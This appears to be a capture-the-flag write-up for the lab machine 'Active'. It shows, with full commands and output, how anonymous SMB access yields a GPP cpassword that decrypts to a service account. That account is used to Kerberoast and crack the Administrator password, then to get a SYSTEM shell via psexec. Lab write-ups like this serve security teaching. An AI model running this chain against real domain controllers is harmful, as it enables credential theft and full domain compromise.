Active

Jun 22, 2026 Easy

Introduction

Active is an easy Windows box and one of the best “first real Active Directory” machines on the platform, because it teaches two techniques you will use on almost every AD engagement: recovering a Group Policy Preferences (GPP) cpassword, and Kerberoasting.

The chain is short and entirely credential-driven. There is no SSH, no WinRM, no RDP, so from the very start we know we are not getting an interactive shell the easy way; everything happens over SMB and Kerberos. Anonymous SMB access lets us read the Replication share, which is an exposed copy of SYSVOL, and buried in it is a Groups.xml file with an encrypted password. Microsoft published the AES key that encrypts these years ago, so decrypting it is instant, and it hands us the svc_tgs account. From there, the Domain Administrator account has been misconfigured with a Service Principal Name, which makes it Kerberoastable: we request its service ticket, crack it offline, and log in as Administrator.

Enumeration

BASH
echo "<target_ip>  active.htb" | sudo tee -a /etc/hosts

Service Discovery

BASH
sudo nmap active.htb -T4 --min-rate 3500 -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389 -sC -sV -oN scans/service-scan.nmap
BASH
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS 6.1.7601 (Windows Server 2008 R2 SP1)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb)
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows Server 2008 R2 SP1

A domain controller for active.htb running the old Windows Server 2008 R2. The important observation is what is missing: no 22 (SSH), no 5985 (WinRM), no 3389 (RDP). Whatever credentials we find, we will have to use them against SMB, LDAP, and Kerberos rather than expecting a shell service. That single fact decides the whole route to root.

SMB shares as anonymous

The first check on any DC is anonymous SMB. It worked, and one share stands out.

BASH
nxc smb active.htb -u '' -p '' --shares
TEXT
Share           Permissions     Remark
-----           -----------     ------
ADMIN$
C$
IPC$
NETLOGON
Replication     READ
SYSVOL
Users

Replication is readable with a null session. That name is a giveaway: it is a copy of SYSVOL, the domain-wide share where Group Policy lives, and legacy Group Policy Preferences are the classic place to find a stored password.

Foothold

Looting the GPP cpassword

I pulled the whole share down recursively and went hunting for the Groups.xml that GPP uses to push local users.

BASH
smbclient //active.htb/Replication -N
# recurse ON; prompt OFF; mget * ... then browse to:
# active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml

Groups.xml contained exactly what we were hoping for: a user entry with a cpassword attribute.

XML
<User ... name="active.htb\SVC_TGS" ...>
  <Properties action="U" ... cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
    userName="active.htb\SVC_TGS"/>
</User>

cpassword is an AES-256 encrypted password, and here is the whole point of the technique: in MS14-025, Microsoft published the private AES key used to encrypt these values. So the “encryption” is effectively reversible by anyone. gpp-decrypt has the key baked in.

BASH
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18

We now have svc_tgs:GPPstillStandingStrong2k18.

Documented dead ends (for completeness): the same policy tree held GptTmpl.inf (just the domain password policy) and a Registry.pol that decoded to an EFS certificate blob. I looked at both because they were there, but neither led anywhere. Worth a glance, not worth an hour.

Validating the credential with NetExec confirms it and upgrades our SMB access. svc_tgs can now read SYSVOL and Users (so the user flag is reachable on the Users share), and it shows the domain has no account lockout (Account Lockout Threshold: None), which means the Kerberos attack coming next is safe to run.

BASH
nxc smb active.htb -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' --shares --users

Privilege Escalation — Kerberoasting

svc_tgs is a plain domain user with no obvious way up, and remember there is no shell service to log into. But any authenticated domain user can request a Kerberos service ticket (TGS) for any account that has a Service Principal Name, and that ticket is encrypted with the target account’s password hash. Request it, and you can crack it offline. This is Kerberoasting.

Impacket’s GetUserSPNs asks the DC for every account with an SPN and requests their tickets in one shot.

BASH
impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip <target_ip> -request -outputfile kerberoast.hashes
TEXT
ServicePrincipalName  Name           MemberOf
--------------------  -------------  --------------------------------------------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb

This is the misconfiguration that makes the box: the account with the SPN active/CIFS is Administrator itself. Normally SPNs live on low-value service accounts; putting one on the Domain Admin means its password hash is now crackable by any user. We got its TGS hash.

TEXT
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$4f6d8dbca473c9cb0d32d94ae30b9cb9$88dd9da8...

Crack it with hashcat (mode 13100 = Kerberoast TGS-REP) against rockyou.

BASH
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
...
$krb5tgs$23$*Administrator$ACTIVE.HTB$...:Ticketmaster1968

Administrator:Ticketmaster1968. Since Administrator is a local admin on the DC and there is no shell service, we use SMB itself: Impacket’s psexec gives a SYSTEM shell over 445.

BASH
impacket-psexec active.htb/administrator:Ticketmaster1968@<target_ip>

C:\Windows\system32> whoami
nt authority\system

Machine rooted.

Attack Chain Recap

TEXT
nmap                                 ->  DC active.htb (2008 R2), no SSH/WinRM/RDP
nxc smb -u '' -p '' --shares         ->  Replication readable (null session)
loot Replication (SYSVOL copy)       ->  Groups.xml with GPP cpassword
gpp-decrypt (MS14-025 leaked key)    ->  svc_tgs:GPPstillStandingStrong2k18
GetUserSPNs -request                 ->  Administrator has SPN active/CIFS -> TGS hash
hashcat -m 13100                     ->  Administrator:Ticketmaster1968
impacket-psexec                      ->  NT AUTHORITY\SYSTEM

Key takeaways

  • Read the missing ports. No SSH/WinRM/RDP told me up front that this box is won over SMB and Kerberos, not by grabbing a shell. Absent services are enumeration too.
  • GPP cpassword is “encrypted” in name only. MS14-025 leaked the AES key, so any cpassword in a readable SYSVOL/Replication share is a free credential. Always check Policies\...\Preferences\Groups\Groups.xml.
  • Kerberoast every SPN, and read whose it is. The whole privesc was noticing that the SPN belonged to Administrator. A privileged account with an SPN is a direct offline crack to Domain Admin.
  • No shell service is not a dead end. impacket-psexec/wmiexec turn admin credentials into a SYSTEM shell over SMB when RDP/WinRM are closed.

References